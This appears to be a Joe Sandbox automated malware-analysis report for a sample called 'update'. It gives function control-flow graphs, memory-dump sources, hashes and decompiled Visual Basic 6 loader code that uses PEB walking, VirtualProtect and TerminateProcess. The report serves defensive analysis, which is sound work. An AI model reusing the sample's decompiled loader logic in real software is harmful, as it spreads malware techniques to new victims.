                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_update.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: #100
                                                                                                                                        • String ID: VB5!6&*
                                                                                                                                        • API String ID: 1341478452-3593831657
                                                                                                                                        • Opcode ID: 31bc58e73505d0b6af78f78763621d0c83ee7d4447795e39a172d3ed1b11426b
                                                                                                                                        • Instruction ID: 0c2475f126dc65154f13c8d8fd8941998392aaa8cc0116460550a9ea45ec6501
                                                                                                                                        • Opcode Fuzzy Hash: 31bc58e73505d0b6af78f78763621d0c83ee7d4447795e39a172d3ed1b11426b
                                                                                                                                        • Instruction Fuzzy Hash: 7FE02486A4E3C01EE70722718A206853FB14CA3A8939E85EBC4C1DE5B7D95E080AC366
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 007B16D9 Relevance: 1.8, APIs: 1, Instructions: 343COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 41 7b16d9-7b183c call 7b1233 45 7b1842-7b185c 41->45 47 7b1862-7b186d 45->47 48 7b19a6-7b19ad 45->48 47->48 49 7b1873-7b1878 47->49 50 7b1bef-7b1bf7 TerminateProcess 48->50 51 7b19b3 call 7b1bd7 48->51 52 7b187e-7b1883 49->52 53 7b1aa3-7b1af5 call 7b1b84 call 7b1bd7 49->53 57 7b19b8 51->57 55 7b1bf9-7b3092 call 7b1c01 call 7b1b6b call 7b2422 52->55 56 7b1889-7b1bb6 52->56 72 7b1b32 53->72 73 7b1af7-7b1b26 53->73 56->57 57->45 72->57 78 7b1b28 73->78 78->72
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.361280175.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_update.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: ed5f2bfe9ad2cc52703c59514bf09e8be89a55102bdfc7bff957c377021ca448
                                                                                                                                        • Instruction ID: e1d72c2f872cefc04f909b6d2e775c3f94b11102f0847e80ea711fda461399a4
                                                                                                                                        • Opcode Fuzzy Hash: ed5f2bfe9ad2cc52703c59514bf09e8be89a55102bdfc7bff957c377021ca448
                                                                                                                                        • Instruction Fuzzy Hash: 7441D370200285EFEB29DF28CCA9FE9B7A2FF09304F904214F51DCB191DB38A8908B55
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 007B1BDB Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 85 7b1bdb-7b1bea 86 7b1bed-7b1bf7 TerminateProcess 85->86 87 7b1bec 85->87 87->86
                                                                                                                                        APIs
                                                                                                                                        • TerminateProcess.KERNELBASE(000000FF,00000000,007B325A), ref: 007B1BF3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.361280175.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_update.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ProcessTerminate
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 560597551-0
                                                                                                                                        • Opcode ID: 70a9c7429159008ca5cd0aa7f8df2603c9f3f12f56bb60d4a04b83138df95abe
                                                                                                                                        • Instruction ID: e107afb31a7964d74051ceb81a04056cd5e2bb385b085ea32f0c9f96a8bf0560
                                                                                                                                        • Opcode Fuzzy Hash: 70a9c7429159008ca5cd0aa7f8df2603c9f3f12f56bb60d4a04b83138df95abe
                                                                                                                                        • Instruction Fuzzy Hash: 91D0C7B2744245DFC74306B49C187C837D05F63275F5D0192A411CF0E1F1584D495711
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00401F68 Relevance: .0, Instructions: 8COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 110 401f68-401f6f 111 401f71 110->111 112 401f73-401f78 110->112 111->112 113 401f7f 112->113 113->113
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.361064141.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000003.00000002.360921697.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000003.00000002.361064141.0000000000406000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000003.00000002.361064141.0000000000473000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000003.00000002.361209641.000000000047E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000003.00000002.361215792.000000000047F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_update.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: ba810618c05d5d355356758522a818632ffdf4ea8224dc9a9e95ea5d955d483e
                                                                                                                                        • Instruction ID: 140511b50e188c0989283d9b0a096077cd6ab4819ba8abac8917961ea5c1297b
                                                                                                                                        • Opcode Fuzzy Hash: ba810618c05d5d355356758522a818632ffdf4ea8224dc9a9e95ea5d955d483e
                                                                                                                                        • Instruction Fuzzy Hash: 69B01220394043AAE71052648C018221180E2083C03240D73F059F61F0CB38CD40413E
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Non-executed Functions

                                                                                                                                        Function 007B2453 Relevance: 2.6, Strings: 1, Instructions: 1327COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 156 7b2453-7b2462 GetPEB 157 7b2464-7b2468 156->157 157->157 158 7b246a-7b246d 157->158 159 7b2472-7b2475 158->159 160 7b2481-7b2495 159->160 161 7b2477-7b247f 159->161 162 7b2496-7b249a 160->162 161->159 162->162 163 7b249c-7b24a0 162->163 163->162 164 7b24a2-7b24a6 163->164 165 7b24a8-7b267d 164->165 166 7b24b5-7b3fef call 7b24be 164->166
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.361280175.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_update.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: Z2{
                                                                                                                                        • API String ID: 0-3033370289
                                                                                                                                        • Opcode ID: 66947dfb9e13bb9df7986c400c4d8b7e7d98c710a7ff6bc3c9aa070b8047543c
                                                                                                                                        • Instruction ID: 7c9e8f563a44eebb02a173ceee055c6eecf90b72b8b745d97a6e1703cb52a2fe
                                                                                                                                        • Opcode Fuzzy Hash: 66947dfb9e13bb9df7986c400c4d8b7e7d98c710a7ff6bc3c9aa070b8047543c
                                                                                                                                        • Instruction Fuzzy Hash: 6B723035F12694476320D754C54D7ABF7C3D3AC741722B126CC5AB7229F878AC8245CD
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 007B106A Relevance: .1, Instructions: 147COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.361280175.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_update.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MemoryProtectVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2706961497-0
                                                                                                                                        • Opcode ID: e3b8e84a79b10a85b8f547b7f664c7e2aeb465dfe6dca36fbef0aa5ca0ecb379
                                                                                                                                        • Instruction ID: d9cf67a965b5fe00017a2a3d12126ee6dbd2d826a9a6a9a30196264e8bb10042
                                                                                                                                        • Opcode Fuzzy Hash: e3b8e84a79b10a85b8f547b7f664c7e2aeb465dfe6dca36fbef0aa5ca0ecb379
                                                                                                                                        • Instruction Fuzzy Hash: 42518B749543858FDF25CF2CC8E5755FB90EB53324FC492A9D6A58E2DAC3788442C722
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 007B12AF Relevance: .0, Instructions: 16COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.361280175.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_update.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: af68b8877f71b6090b4145641b897d1e4f7d71ce21d0f350f00a555af201af40
                                                                                                                                        • Instruction ID: f0fc1408d4b408f6c1d62deca5642ed30a2b7cd75622cb2b95f703850f3127d9
                                                                                                                                        • Opcode Fuzzy Hash: af68b8877f71b6090b4145641b897d1e4f7d71ce21d0f350f00a555af201af40
                                                                                                                                        • Instruction Fuzzy Hash: ECD067757816808BEB51C768DCD0BD033D1AB59750FC854B4D545CBB96D19C9881D611
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 007B12A2 Relevance: .0, Instructions: 4COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.361280175.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_update.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
                                                                                                                                        • Instruction ID: bebcbd0f18a999ce64e2d619b59837d29f74db5f3d96bd371bc818b82041d4c7
                                                                                                                                        • Opcode Fuzzy Hash: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
                                                                                                                                        • Instruction Fuzzy Hash: F9B00179662A80CFCE96CF09C290E40B3B4FB48B50F4258D0E8118BB22C268E900CA10
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0047CB24 Relevance: 54.4, APIs: 28, Strings: 3, Instructions: 180COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        C-Code - Quality: 30%
                                                                                                                                        			E0047CB24(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v36;
				intOrPtr _v40;
				void* _v44;
				void* _v48;
				char _v64;
				intOrPtr _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v84;
				long long _v92;
				intOrPtr _v96;
				char _v100;
				signed int _v104;
				char _v108;
				char _v116;
				char _v124;
				intOrPtr _v132;
				char _v140;
				intOrPtr _v148;
				char _v156;
				void* _v176;
				signed int _v180;
				intOrPtr* _v184;
				signed int _v188;
				signed int _v196;
				intOrPtr* _v200;
				signed int _v204;
				signed int _v208;
				char* _t84;
				short _t88;
				char* _t91;
				signed int _t97;
				signed int _t102;
				char* _t108;
				char* _t116;
				intOrPtr _t136;
				char _t143;
				long long _t144;

				_push(0x4011a6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t136;
				L004011A0();
				_v12 = _t136;
				_v8 = 0x401190;
				L0040125A();
				_v100 = 0x81f1f2;
				if(0 != 0) {
					_push(1);
					L00401254();
					_v84 = 0;
				}
				_t84 =  &_v64;
				_push(_t84);
				L0040124E();
				_v68 = _t84;
				_v148 = _v40;
				_v156 = 0x8008;
				_push( &_v124);
				L004012BA();
				_push( &_v156);
				_t88 =  &_v124;
				_push(_t88);
				L00401248();
				_v176 = _t88;
				L004012B4();
				if(_v176 != 0) {
					L0040125A();
				}
				_push(0);
				_push(0xffffffff);
				_push( &_v36);
				_push(L"Volver");
				_t91 =  &_v124;
				_push(_t91);
				L0040129C();
				L004012DE();
				_t143 =  *0x401188;
				L00401242();
				_v76 = _t91;
				if( *0x47e4f8 != 0) {
					_v200 = 0x47e4f8;
				} else {
					_push(0x47e4f8);
					_push(0x402a34);
					L00401308();
					_v200 = 0x47e4f8;
				}
				_v176 =  *_v200;
				_t97 =  *((intOrPtr*)( *_v176 + 0x14))(_v176,  &_v108);
				asm("fclex");
				_v180 = _t97;
				if(_v180 >= 0) {
					_v204 = _v204 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x402a24);
					_push(_v176);
					_push(_v180);
					L00401302();
					_v204 = _t97;
				}
				_v184 = _v108;
				_t102 =  *((intOrPtr*)( *_v184 + 0x50))(_v184,  &_v104);
				asm("fclex");
				_v188 = _t102;
				if(_v188 >= 0) {
					_v208 = _v208 & 0x00000000;
				} else {
					_push(0x50);
					_push(0x402a44);
					_push(_v184);
					_push(_v188);
					L00401302();
					_v208 = _t102;
				}
				_v196 = _v104;
				_v104 = _v104 & 0x00000000;
				L00401320();
				_t116 =  &_v108;
				L004012F0();
				_v132 = 1;
				_v140 = 2;
				_v116 = 1;
				_v124 = 2;
				_push( &_v140);
				_push( &_v124);
				asm("fld1");
				_push(_t116);
				_push(_t116);
				_v100 = _t143;
				asm("fld1");
				_push(_t116);
				_push(_t116);
				_v108 = _t143;
				_t144 =  *0x401180;
				_push(_t116);
				_push(_t116);
				_v116 = _t144;
				L0040123C();
				_v92 = _t144;
				_push( &_v140);
				_push( &_v124);
				_push(2);
				L00401260();
				_v116 = 0x37;
				_v124 = 2;
				_t108 =  &_v124;
				_push(_t108);
				_push(1);
				_push(_v96);
				L00401236();
				L00401320();
				L004012B4();
				asm("wait");
				_push(0x47cdfd);
				L004012B4();
				L00401284();
				L00401284();
				L00401284();
				L004012B4();
				L00401284();
				L00401284();
				return _t108;
			}











































                                                                                                                                        0x0047cb29
                                                                                                                                        0x0047cb34
                                                                                                                                        0x0047cb35
                                                                                                                                        0x0047cb41
                                                                                                                                        0x0047cb49
                                                                                                                                        0x0047cb4c
                                                                                                                                        0x0047cb59
                                                                                                                                        0x0047cb5e
                                                                                                                                        0x0047cb69
                                                                                                                                        0x0047cb6b
                                                                                                                                        0x0047cb6d
                                                                                                                                        0x0047cb75
                                                                                                                                        0x0047cb75
                                                                                                                                        0x0047cb78
                                                                                                                                        0x0047cb7b
                                                                                                                                        0x0047cb7c
                                                                                                                                        0x0047cb81
                                                                                                                                        0x0047cb87
                                                                                                                                        0x0047cb8d
                                                                                                                                        0x0047cb9a
                                                                                                                                        0x0047cb9b
                                                                                                                                        0x0047cba6
                                                                                                                                        0x0047cba7
                                                                                                                                        0x0047cbaa
                                                                                                                                        0x0047cbab
                                                                                                                                        0x0047cbb0
                                                                                                                                        0x0047cbba
                                                                                                                                        0x0047cbc8
                                                                                                                                        0x0047cbd2
                                                                                                                                        0x0047cbd2
                                                                                                                                        0x0047cbd7
                                                                                                                                        0x0047cbd9
                                                                                                                                        0x0047cbde
                                                                                                                                        0x0047cbdf
                                                                                                                                        0x0047cbe4
                                                                                                                                        0x0047cbe7
                                                                                                                                        0x0047cbe8
                                                                                                                                        0x0047cbf3
                                                                                                                                        0x0047cbf8
                                                                                                                                        0x0047cbfe
                                                                                                                                        0x0047cc03
                                                                                                                                        0x0047cc0d
                                                                                                                                        0x0047cc2a
                                                                                                                                        0x0047cc0f
                                                                                                                                        0x0047cc0f
                                                                                                                                        0x0047cc14
                                                                                                                                        0x0047cc19
                                                                                                                                        0x0047cc1e
                                                                                                                                        0x0047cc1e
                                                                                                                                        0x0047cc3c
                                                                                                                                        0x0047cc54
                                                                                                                                        0x0047cc57
                                                                                                                                        0x0047cc59
                                                                                                                                        0x0047cc66
                                                                                                                                        0x0047cc88
                                                                                                                                        0x0047cc68
                                                                                                                                        0x0047cc68
                                                                                                                                        0x0047cc6a
                                                                                                                                        0x0047cc6f
                                                                                                                                        0x0047cc75
                                                                                                                                        0x0047cc7b
                                                                                                                                        0x0047cc80
                                                                                                                                        0x0047cc80
                                                                                                                                        0x0047cc92
                                                                                                                                        0x0047ccaa
                                                                                                                                        0x0047ccad
                                                                                                                                        0x0047ccaf
                                                                                                                                        0x0047ccbc
                                                                                                                                        0x0047ccde
                                                                                                                                        0x0047ccbe
                                                                                                                                        0x0047ccbe
                                                                                                                                        0x0047ccc0
                                                                                                                                        0x0047ccc5
                                                                                                                                        0x0047cccb
                                                                                                                                        0x0047ccd1
                                                                                                                                        0x0047ccd6
                                                                                                                                        0x0047ccd6
                                                                                                                                        0x0047cce8
                                                                                                                                        0x0047ccee
                                                                                                                                        0x0047ccfb
                                                                                                                                        0x0047cd00
                                                                                                                                        0x0047cd03
                                                                                                                                        0x0047cd08
                                                                                                                                        0x0047cd0f
                                                                                                                                        0x0047cd19
                                                                                                                                        0x0047cd20
                                                                                                                                        0x0047cd2d
                                                                                                                                        0x0047cd31
                                                                                                                                        0x0047cd32
                                                                                                                                        0x0047cd34
                                                                                                                                        0x0047cd35
                                                                                                                                        0x0047cd36
                                                                                                                                        0x0047cd39
                                                                                                                                        0x0047cd3b
                                                                                                                                        0x0047cd3c
                                                                                                                                        0x0047cd3d
                                                                                                                                        0x0047cd40
                                                                                                                                        0x0047cd46
                                                                                                                                        0x0047cd47
                                                                                                                                        0x0047cd48
                                                                                                                                        0x0047cd4b
                                                                                                                                        0x0047cd50
                                                                                                                                        0x0047cd59
                                                                                                                                        0x0047cd5d
                                                                                                                                        0x0047cd5e
                                                                                                                                        0x0047cd60
                                                                                                                                        0x0047cd68
                                                                                                                                        0x0047cd6f
                                                                                                                                        0x0047cd76
                                                                                                                                        0x0047cd79
                                                                                                                                        0x0047cd7a
                                                                                                                                        0x0047cd7c
                                                                                                                                        0x0047cd7f
                                                                                                                                        0x0047cd89
                                                                                                                                        0x0047cd91
                                                                                                                                        0x0047cd96
                                                                                                                                        0x0047cd97
                                                                                                                                        0x0047cdc7
                                                                                                                                        0x0047cdcf
                                                                                                                                        0x0047cdd7
                                                                                                                                        0x0047cddf
                                                                                                                                        0x0047cde7
                                                                                                                                        0x0047cdef
                                                                                                                                        0x0047cdf7
                                                                                                                                        0x0047cdfc

                                                                                                                                        APIs
                                                                                                                                        • __vbaChkstk.MSVBVM60(?,004011A6), ref: 0047CB41
                                                                                                                                        • __vbaStrCopy.MSVBVM60(?,?,?,?,004011A6), ref: 0047CB59
                                                                                                                                        • #571.MSVBVM60(00000001), ref: 0047CB6D
                                                                                                                                        • #563.MSVBVM60(?), ref: 0047CB7C
                                                                                                                                        • #610.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0047CB9B
                                                                                                                                        • __vbaVarTstEq.MSVBVM60(?,00008008,?), ref: 0047CBAB
                                                                                                                                        • __vbaFreeVar.MSVBVM60(?,00008008,?), ref: 0047CBBA
                                                                                                                                        • __vbaStrCopy.MSVBVM60(?,00008008,?), ref: 0047CBD2
                                                                                                                                        • #711.MSVBVM60(?,Volver,?,000000FF,00000000,?,00008008,?), ref: 0047CBE8
                                                                                                                                        • __vbaVarMove.MSVBVM60(?,Volver,?,000000FF,00000000,?,00008008,?), ref: 0047CBF3
                                                                                                                                        • __vbaR8IntI4.MSVBVM60(?,Volver,?,000000FF,00000000,?,00008008,?), ref: 0047CBFE
                                                                                                                                        • __vbaNew2.MSVBVM60(00402A34,0047E4F8,?,Volver,?,000000FF,00000000,?,00008008,?), ref: 0047CC19
                                                                                                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402A24,00000014,?,?,?,?,Volver,?,000000FF,00000000,?,00008008,?), ref: 0047CC7B
                                                                                                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402A44,00000050,?,?,?,?,Volver,?,000000FF,00000000,?,00008008,?), ref: 0047CCD1
                                                                                                                                        • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,Volver,?,000000FF,00000000,?,00008008,?), ref: 0047CCFB
                                                                                                                                        • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,Volver,?,000000FF,00000000,?,00008008,?), ref: 0047CD03
                                                                                                                                        • #678.MSVBVM60(?,?,?,?,?,?,00000002,00000002,?,?,?,?,?,?,Volver,?), ref: 0047CD4B
                                                                                                                                        • __vbaFreeVarList.MSVBVM60(00000002,00000002,00000002,?,?,?,?,?,?,00000002,00000002), ref: 0047CD60
                                                                                                                                        • #631.MSVBVM60(?,00000001,00000002), ref: 0047CD7F
                                                                                                                                        • __vbaStrMove.MSVBVM60(?,00000001,00000002), ref: 0047CD89
                                                                                                                                        • __vbaFreeVar.MSVBVM60(?,00000001,00000002), ref: 0047CD91
                                                                                                                                        • __vbaFreeVar.MSVBVM60(0047CDFD,?,00000001,00000002), ref: 0047CDC7
                                                                                                                                        • __vbaFreeStr.MSVBVM60(0047CDFD,?,00000001,00000002), ref: 0047CDCF
                                                                                                                                        • __vbaFreeStr.MSVBVM60(0047CDFD,?,00000001,00000002), ref: 0047CDD7
                                                                                                                                        • __vbaFreeStr.MSVBVM60(0047CDFD,?,00000001,00000002), ref: 0047CDDF
                                                                                                                                        • __vbaFreeVar.MSVBVM60(0047CDFD,?,00000001,00000002), ref: 0047CDE7
                                                                                                                                        • __vbaFreeStr.MSVBVM60(0047CDFD,?,00000001,00000002), ref: 0047CDEF
                                                                                                                                        • __vbaFreeStr.MSVBVM60(0047CDFD,?,00000001,00000002), ref: 0047CDF7
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.361064141.0000000000473000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000003.00000002.360921697.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000003.00000002.361064141.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000003.00000002.361064141.0000000000406000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000003.00000002.361209641.000000000047E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000003.00000002.361215792.000000000047F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_update.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __vba$Free$Move$CheckCopyHresult$#563#571#610#631#678#711ChkstkListNew2
                                                                                                                                        • String ID: 7$Dishevelled7$Volver
                                                                                                                                        • API String ID: 1917360420-2773989111
                                                                                                                                        • Opcode ID: 2fe2dd6fa13432f09fa8f6a7231816c77a5ad3aca185559f317abd92f98402e4
                                                                                                                                        • Instruction ID: 8675a4aef6c55bb5a6538cd37236a5ef74517b6ab3f6460b38bc4d9df03f72c4
                                                                                                                                        • Opcode Fuzzy Hash: 2fe2dd6fa13432f09fa8f6a7231816c77a5ad3aca185559f317abd92f98402e4
                                                                                                                                        • Instruction Fuzzy Hash: 6771EA719002189FEB15EBA1CC85FDDBBB9BF08304F5081AEE509B71A1DB785A89CF15
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0047C9CD Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 76COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        C-Code - Quality: 42%
                                                                                                                                        			E0047C9CD(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v70;
				intOrPtr _v72;
				void* _v88;
				intOrPtr _v96;
				char _v104;
				char _v120;
				char _v136;
				intOrPtr _v144;
				char _v152;
				char _v168;
				char* _v176;
				char _v184;
				intOrPtr _v208;
				char _v216;
				char* _t33;
				char* _t36;
				char* _t38;
				char* _t43;
				intOrPtr _t55;

				_push(0x4011a6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t55;
				L004011A0();
				_v12 = _t55;
				_v8 = 0x401170;
				_v96 = 0x80020004;
				_v104 = 0xa;
				_v176 =  &_v70;
				_v184 = 0x4002;
				_push(1);
				_push(1);
				_push( &_v104);
				_push( &_v184);
				_t33 =  &_v120;
				_push(_t33);
				L00401272();
				_v208 = 0x402aa4;
				_v216 = 8;
				_push(_v72);
				L00401266();
				L00401320();
				_push(_t33);
				L0040126C();
				_v144 = _t33;
				_v152 = 8;
				_push( &_v120);
				_push( &_v216);
				_t36 =  &_v136;
				_push(_t36);
				L00401278();
				_push(_t36);
				_push( &_v152);
				_t38 =  &_v168;
				_push(_t38);
				L00401278();
				_push(_t38);
				L004012C0();
				L00401320();
				L00401284();
				_push( &_v168);
				_push( &_v152);
				_push( &_v136);
				_push( &_v120);
				_t43 =  &_v104;
				_push(_t43);
				_push(5);
				L00401260();
				_push(0x47cb15);
				return _t43;
			}
























                                                                                                                                        0x0047c9d2
                                                                                                                                        0x0047c9dd
                                                                                                                                        0x0047c9de
                                                                                                                                        0x0047c9ea
                                                                                                                                        0x0047c9f2
                                                                                                                                        0x0047c9f5
                                                                                                                                        0x0047c9fc
                                                                                                                                        0x0047ca03
                                                                                                                                        0x0047ca0d
                                                                                                                                        0x0047ca13
                                                                                                                                        0x0047ca1d
                                                                                                                                        0x0047ca1f
                                                                                                                                        0x0047ca24
                                                                                                                                        0x0047ca2b
                                                                                                                                        0x0047ca2c
                                                                                                                                        0x0047ca2f
                                                                                                                                        0x0047ca30
                                                                                                                                        0x0047ca35
                                                                                                                                        0x0047ca3f
                                                                                                                                        0x0047ca49
                                                                                                                                        0x0047ca4c
                                                                                                                                        0x0047ca56
                                                                                                                                        0x0047ca5b
                                                                                                                                        0x0047ca5c
                                                                                                                                        0x0047ca61
                                                                                                                                        0x0047ca67
                                                                                                                                        0x0047ca74
                                                                                                                                        0x0047ca7b
                                                                                                                                        0x0047ca7c
                                                                                                                                        0x0047ca82
                                                                                                                                        0x0047ca83
                                                                                                                                        0x0047ca88
                                                                                                                                        0x0047ca8f
                                                                                                                                        0x0047ca90
                                                                                                                                        0x0047ca96
                                                                                                                                        0x0047ca97
                                                                                                                                        0x0047ca9c
                                                                                                                                        0x0047ca9d
                                                                                                                                        0x0047caa9
                                                                                                                                        0x0047cab1
                                                                                                                                        0x0047cabc
                                                                                                                                        0x0047cac3
                                                                                                                                        0x0047caca
                                                                                                                                        0x0047cace
                                                                                                                                        0x0047cacf
                                                                                                                                        0x0047cad2
                                                                                                                                        0x0047cad3
                                                                                                                                        0x0047cad5
                                                                                                                                        0x0047cadd
                                                                                                                                        0x00000000

                                                                                                                                        APIs
                                                                                                                                        • __vbaChkstk.MSVBVM60(?,004011A6), ref: 0047C9EA
                                                                                                                                        • #660.MSVBVM60(?,00004002,0000000A,00000001,00000001), ref: 0047CA30
                                                                                                                                        • __vbaStrI2.MSVBVM60(?,?,?,?,?,00004002,0000000A,00000001,00000001), ref: 0047CA4C
                                                                                                                                        • __vbaStrMove.MSVBVM60(?,?,?,?,?,00004002,0000000A,00000001,00000001), ref: 0047CA56
                                                                                                                                        • #713.MSVBVM60(00000000,?,?,?,?,?,00004002,0000000A,00000001,00000001), ref: 0047CA5C
                                                                                                                                        • __vbaVarCat.MSVBVM60(?,00000008,?,00000000,?,?,?,?,?,00004002,0000000A,00000001,00000001), ref: 0047CA83
                                                                                                                                        • __vbaVarCat.MSVBVM60(?,00000008,00000000,?,00000008,?,00000000,?,?,?,?,?,00004002,0000000A,00000001,00000001), ref: 0047CA97
                                                                                                                                        • __vbaStrVarMove.MSVBVM60(00000000,?,00000008,00000000,?,00000008,?,00000000,?,?,?,?,?,00004002,0000000A,00000001), ref: 0047CA9D
                                                                                                                                        • __vbaStrMove.MSVBVM60(00000000,?,00000008,00000000,?,00000008,?,00000000,?,?,?,?,?,00004002,0000000A,00000001), ref: 0047CAA9
                                                                                                                                        • __vbaFreeStr.MSVBVM60(00000000,?,00000008,00000000,?,00000008,?,00000000,?,?,?,?,?,00004002,0000000A,00000001), ref: 0047CAB1
                                                                                                                                        • __vbaFreeVarList.MSVBVM60(00000005,0000000A,?,?,00000008,?,00000000,?,00000008,00000000,?,00000008,?,00000000,?), ref: 0047CAD5
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.361064141.0000000000473000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
